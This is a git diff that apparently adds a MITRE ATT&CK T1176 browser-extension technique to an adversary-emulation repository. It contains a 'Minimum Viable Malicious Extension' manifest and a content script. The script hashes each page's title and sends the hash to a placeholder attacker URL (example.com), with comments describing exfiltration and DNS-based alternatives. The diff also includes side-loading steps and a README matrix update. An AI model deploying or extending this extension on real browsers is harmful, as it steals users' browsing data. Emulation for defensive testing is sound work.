diff --git a/Linux/Collection/Browser_Extensions.md b/Linux/Collection/Browser_Extensions.md new file mode 100644 index 00000000..f38f59f4 --- /dev/null +++ b/Linux/Collection/Browser_Extensions.md @@ -0,0 +1,12 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' \ No newline at end of file diff --git a/Linux/Payloads/Browser_Extension/inline.js b/Linux/Payloads/Browser_Extension/inline.js new file mode 100644 index 00000000..15a8e4c7 --- /dev/null +++ b/Linux/Payloads/Browser_Extension/inline.js @@ -0,0 +1,37 @@ +function exfil(str) { + // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included. + // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com + // and probably a thousand other methods. But this one is easy. + var buffer = new TextEncoder("utf-8").encode(str); + return crypto.subtle.digest("SHA-256", buffer).then(callUrl); +} + +function callUrl(buffer) { + // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls + // except it's example.com so w/e + var digest = hex(buffer); + var url = "https://example.com/" + digest; + console.log("Exfiltrating data to " + url) + var xmlHttp = new XMLHttpRequest(); + xmlHttp.open( "GET", url, true); + xmlHttp.send( null); + return digest; +} + +function hex(buffer) { + // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest + var hexCodes = []; + var view = new DataView(buffer); + for (var i = 0; i < view.byteLength; i += 4) { + var value = view.getUint32(i) + var stringValue = value.toString(16) + var padding = '00000000' + var paddedValue = (padding + stringValue).slice(-padding.length) + hexCodes.push(paddedValue); + } + var athing = hexCodes.join(""); + return hexCodes.join(""); +} + +// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here. +var digest = exfil(document.title); \ No newline at end of file diff --git a/Linux/Payloads/Browser_Extension/manifest.json b/Linux/Payloads/Browser_Extension/manifest.json new file mode 100644 index 00000000..a4243cba --- /dev/null +++ b/Linux/Payloads/Browser_Extension/manifest.json @@ -0,0 +1,16 @@ +{ + "name": "Minimum Viable Malicious Extension", + "description": "Base Level Extension", + "version": "1.0", + "manifest_version": 2, + "content_scripts": [ + { + "matches": [ + "" + ], + "js": [ + "inline.js" + ] + } + ] +} \ No newline at end of file diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md new file mode 100644 index 00000000..f38f59f4 --- /dev/null +++ b/Linux/Persistence/Browser_Extensions.md @@ -0,0 +1,12 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' \ No newline at end of file diff --git a/Linux/README.md b/Linux/README.md index 825187fd..7c2cc91c 100644 --- a/Linux/README.md +++ b/Linux/README.md @@ -4,14 +4,14 @@ |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | | Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media | -| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy | -| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | -| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | -| Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | -| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | -| Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels | -| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels | -| | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication | +| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collections/Browser_Extensions.md) | Data Encrypted | Connection Proxy | +| [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol | +| Hidden Files and Directories | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | +| Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | +| Redundant Access | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Trap](Persistence/Trap.md) | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Data from Removable Media | Exfiltration Over Physical Medium | Fallback Channels | +| Valid Accounts | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Input Capture | Scheduled Transfer | Multi-Stage Channels | +| Web Shell | | Install Root Certificate | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication | | | | Masquerading | | | | | | | Multilayer Encryption | | | | Redundant Access | | | | | | | Remote File Copy | | | | Scripting | | | | | | | Standard Application Layer Protocol |